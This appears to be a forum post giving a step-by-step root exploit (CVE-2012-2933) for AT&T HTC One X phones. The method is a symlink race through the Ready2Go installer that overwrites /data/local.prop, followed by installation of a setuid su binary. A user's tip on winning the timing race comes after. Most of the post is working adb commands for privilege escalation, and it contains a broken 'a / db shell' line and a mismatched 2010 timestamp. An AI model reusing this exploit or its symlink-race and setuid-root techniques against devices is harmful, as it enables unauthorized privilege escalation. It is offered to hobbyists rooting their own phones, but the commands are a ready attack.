Update: AT&T disabled the app install feature of the ready2go site around 4:45pm May 25th, thus breaking this. Unless they reenable it, no reason to try this anymore.
Congrats to those that got root out of it, sorry to those that didn't. Will continue research on another one.
Please do not repost this or include it in a script. Timing is critical, putting it in a script will actually make it more of a pain, and may move discussion away from this thread.
This is for the AT&T variation only.
If you would found this exploit useful, and would like to donate the "omg Get jcase an HTC One X fund" please click ->
http://kan.gd/1l7qRequired file:
suFirst, ensure the "/data/install" directory exists, by using AT&t Ready2Go to download and install any app, then uninstall the app.
Next, pick an app that we know the file name of, in our case we used "AT&T Mark the Spot" and setup a symlink from that app's file name to local.prop
adb shell ln -s /data/local.prop /data/install/com.att.android.markthespot.apk
Now comes the timing critical part, you have to use ATT Ready2Go to Download "AT&T Mark the Spot", and interrupt the install process right after the download has finished. Easiest way is to reboot the device, but we have found other ways to do it.
adb reboot
One rebooted, we try and set the property allowing us to get root. If you get permission denied, then the timing was off (or if you are reading this in the future, it may have been patched) and start over.
a
db shell "echo 'ro.kernel.qemu=1' > /data/local.prop"
adb reboot
One rebooted, adb will run as root, and now it is time to install su.
adb shell mount -o remount,rw /system
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
adb shell rm /data/install/*
adb shell rm /data/local.prop
adb reboot
Once rebooted, install the Superuser app from the market. If you want to unlock your boot loader after rooting, follow this thread.
Pro Tip
Here's the way I did it back when I did it:
Open 2 cmd windows
adb devices on both (to make sure daemon is running)
In first shell type adb reboot but do not execute (obviously!)
In second window, cd /data/install
Enter ls -l
Now tell Ready2Go to install.
In that second window SPAM "up arrow - enter" to repeatedly execute ls -l. Observe the .apk file growing in size. When it stops growing it's probably done downloading (I think it was around 5MB but it's been a while). Go back to that first window IMMEDIATELY and hit enter on that adb reboot you typed in. It's a small apk so you need to be fast.
This was my method. Hopefully it works for you!
The Common Vulnerabilities and Exposures (CVE) project has assigned
the name CVE-2012-2933 to this issue. This is a candidate for
inclusion in the CVE list (
http://cve.mitre.org), which standardizes
names for security problems.
October 22, 2010, 11:36:42 am
SMF VERSION
